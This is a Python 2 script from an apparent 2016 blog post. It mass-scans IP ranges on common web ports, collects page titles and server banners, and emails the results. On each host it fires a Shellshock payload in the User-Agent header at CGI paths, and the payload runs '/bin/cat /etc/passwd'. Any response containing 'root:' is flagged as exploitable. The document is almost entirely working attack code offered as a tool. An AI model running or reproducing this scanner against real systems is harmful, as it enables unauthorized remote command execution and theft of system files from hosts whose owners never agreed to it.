python gettitle v2.0

#!/usr/bin/env python
# coding=utf-8

import threading
import requests
import Queue
import sys
import re
import time
import warnings
import datetime
import argparse
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
import smtplib
import httplib

__author__ = 'depycode'
__version__ = 'gettitle v2.0'

warnings.filterwarnings("ignore")

#ip to num
def ip2num(ip):
    ip = [int(x) for x in ip.split('.')]
    return ip[0] << 24 | ip[1] << 16 | ip[2] << 8 | ip[3]

#num to ip
def num2ip(num):
    return '%s.%s.%s.%s'  %((num & 0xff000000) >>24,
                            (num & 0x00ff0000) >>16,
                            (num & 0x0000ff00) >>8,
                            num & 0x000000ff )
#
def ip_range(start, end):
    return [num2ip(num) for num in range(ip2num(start), ip2num(end) + 1) if num & 0xff]


def bash_exp(host):
    headers = {'User-Agent':'() { :;}; echo;/bin/cat /etc/passwd','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'}
    try:
        res = requests.get(host,headers=headers,timeout=8)
        if "root:" in res.content:
            return host
    except:
        pass
#
def bThread(iplist):
    threadl = []
    queue = Queue.Queue()
    for host in iplist:
        queue.put(host)

    for x in xrange(0, int(SETTHREAD)):
        threadl.append(tThread(queue))

    for t in threadl:
        t.start()
    for t in threadl:
        t.join()

#create thread
class tThread(threading.Thread):
    def __init__(self, queue):
        threading.Thread.__init__(self)
        self.queue = queue

    def run(self):
        while not self.queue.empty():
            host = self.queue.get(block=False)
            try:
                checkServer(host)
            except:
                continue

def checkServer(host):
    UA = {'user-agent':'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'}
    k = int(host.split(':')[1])
    try:
        if k==443:
            aimurl = "https://"+host
            #print aimurl
            response = requests.get(url = aimurl,headers = UA,verify=False,timeout = 8)
        else:
            aimurl = "http://"+host
            #print aimurl
            response = requests.get(url = aimurl,headers = UA,timeout = 8)
            #print response.headers
        status = response.status_code
        try:
            serverText = response.headers['server']
        except:
            serverText = ""
        try:
            titleText1 = re.findall(r'<title>(.*?)</title>',response.content,re.S)[0]
            try:
                titleText = titleText1.decode('utf-8').encode('utf-8')
            except:
                titleText = titleText1.decode('gbk','ignore').encode('utf-8','ignore')
        except:
            titleText = ""

        saveData = {"ip":host,"port":str(k),'aimurl':aimurl,"status":status,"server":serverText,"title":titleText}
        print saveData
        Data.append(saveData)
        cgi_poc = ['/cgi-bin/index.cgi','/cgi-bin/login.cgi','/cgi-bin/test-cgi']
        for path in cgi_poc:
            exp_url = aimurl + path
            exp_res = bash_exp(exp_url)
            if exp_res != None:
                bash_list.append(exp_res)
    except:
        pass

def cmd():
    iplist_a = []
    parser = argparse.ArgumentParser(description='GET TITLE .. Author::depycode')
    group = parser.add_mutually_exclusive_group()

    group.add_argument('-i',
                        action="store",
                        dest="iprange",
                        help="use:: python gettitle.py -i 10.100.1.1-10.100.1.254",
    )
    group.add_argument('-f',
                        action="store",
                        dest="ipfile",
                        help="use:: python gettitle.py -f ip.txt",
                        type=str,
    )
    args = parser.parse_args()
    ipfile = args.ipfile
    ip = args.iprange
    if ip:
        iplist_a = ip_range(ip.split('-')[0], ip.split('-')[1])

    elif ipfile:
        iplist_tmp = open(ipfile).readlines()
        for i in iplist_tmp:
            iplist_a.append(i.strip())
        
    else:
        parser.print_help()
        exit()
    return iplist_a

def report(data):
    t = time.strftime('%Y-%m-%d-%H-%M',time.localtime(time.time()))
    filename = 'Title'+'-'+str(t)+".html"
    f = open(filename,"w+")
    table1 = "<meta http-equiv='Content-Type' content='text/html; charset=utf-8'><table border='1'>\n<tr><th>url</th><th>stauts_code</th><th>server</th><th>title</th>\n"
    f.write(table1)
    for i in data:
        rows = "<tr><td><a target='_blank' href='%s'>%s</a></td><td>%s</td><td>%s</td><td>%s</td></tr>\n" %(i['aimurl'],i['ip'],i['status'],i['server'],i['title'])
        f.write(rows)
    table2 = "</table>"
    f.write(table2)
    f.close()
    return filename

def report2txt(data):
    t = time.strftime('%Y-%m-%d-%H-%M',time.localtime(time.time()))
    filename = "ip-"+str(t)+".txt"
    f = open(filename,"w+")
    for i in data:
        url = i['aimurl']
        f.write(url)
        f.write("\n")
    f.close()
    return filename
    
def reportBash(data):
    t = time.strftime('%Y-%m-%d-%H-%M',time.localtime(time.time()))
    filename = 'bash' + str(t) + '.html'
    f = open(filename,'w+')
    table1 = "<meta http-equiv='Content-Type' content='text/html; charset=utf-8'><table border='1'>\n<tr><th>url</th><th>bash_valu</th>\n"
    f.write(table1)
    for i in data:
        rows = "<tr><td><a target='_blank' href='%s'>%s</a></td><td>ON</td></tr>\n" %(i,i)
        f.write(rows)
    table2 = "</table>"
    f.write(table2)
    f.close()
    return filename

def SendMail(f1,f2,f3):
    #创建一个带附件的实例
    msg = MIMEMultipart('alternative')

    text = "报告大王-扫描完成"
    att = MIMEText(text, 'plain')
    #构造附件1
    att1 = MIMEText(open(f1, 'rb').read(), 'base64', 'utf-8')
    att1["Content-Type"] = 'application/octet-stream'
    att1["Content-Disposition"] = 'attachment; filename="report.html"'#这里的filename可以任意写,写什么名字,邮件中显示什么名字

    att2 = MIMEText(open(f2, 'rb').read(), 'base64', 'utf-8')
    att2["Content-Type"] = 'application/octet-stream'
    att2["Content-Disposition"] = 'attachment; filename="ip.txt"'
    
    att3 = MIMEText(open(f3, 'rb').read(), 'base64', 'utf-8')
    att3["Content-Type"] = 'application/octet-stream'
    att3["Content-Disposition"] = 'attachment; filename="bash.html"'

    msg.attach(att)
    msg.attach(att1)
    msg.attach(att2)
    msg.attach(att3)

    #加邮件头
    msg['to'] = '*************'
    msg['from'] = '*************'
    msg['subject'] = 'Scan Finished'
    #发送邮件
    try:
        server = smtplib.SMTP()
        server.connect('*************')
        server.login('*************','*************')
        server.sendmail(msg['from'], msg['to'],msg.as_string())
        server.quit()
        print u'发送成功'
    except Exception, e:
        print str(e)


if __name__ == '__main__':

    global SETTHREAD
    global Data
    global bash_list
    Data = []
    bash_list = []
    starttime = datetime.datetime.now()
    
    try:
        SETTHREAD = 500
        iplist1 = cmd()
        ports = [80,81,8080,8000,8888]
        #ports = [80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,803,806,8094,8000,8001,8002,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8888,9002,443,873,2601,2604,4848,8008,8104,8880,8877,9999,3128,5432,2049,7001,7002,7003,7004,7005,7006,7007,7008,7009,9200,9871,4440,6082,8099,8649,9000,9090,50000,50030,50070]
        iplist = ['{}:{}'.format(x, y) for x in iplist1 for y in ports]
        print '\n[INFO] Will scan '+str(len(iplist1))+" host...\n"
        bThread(iplist)
        
    except KeyboardInterrupt:
        print 'Keyboard Interrupt!'
        sys.exit()
    filenamehtml_report = report(Data)
    filenametxt_ip = report2txt(Data)
    filenamehtml_report_bash = reportBash(bash_list)
    SendMail(filenamehtml_report,filenametxt_ip,filenamehtml_report_bash)

    endtime = datetime.datetime.now()
    print "Finished in "+str((endtime - starttime).seconds)+"S"

 

1:改进了线程 

2:增加bash漏洞检测

posted @ 2016-10-09 15:26  depycode  阅读(654)  评论(0编辑  收藏  举报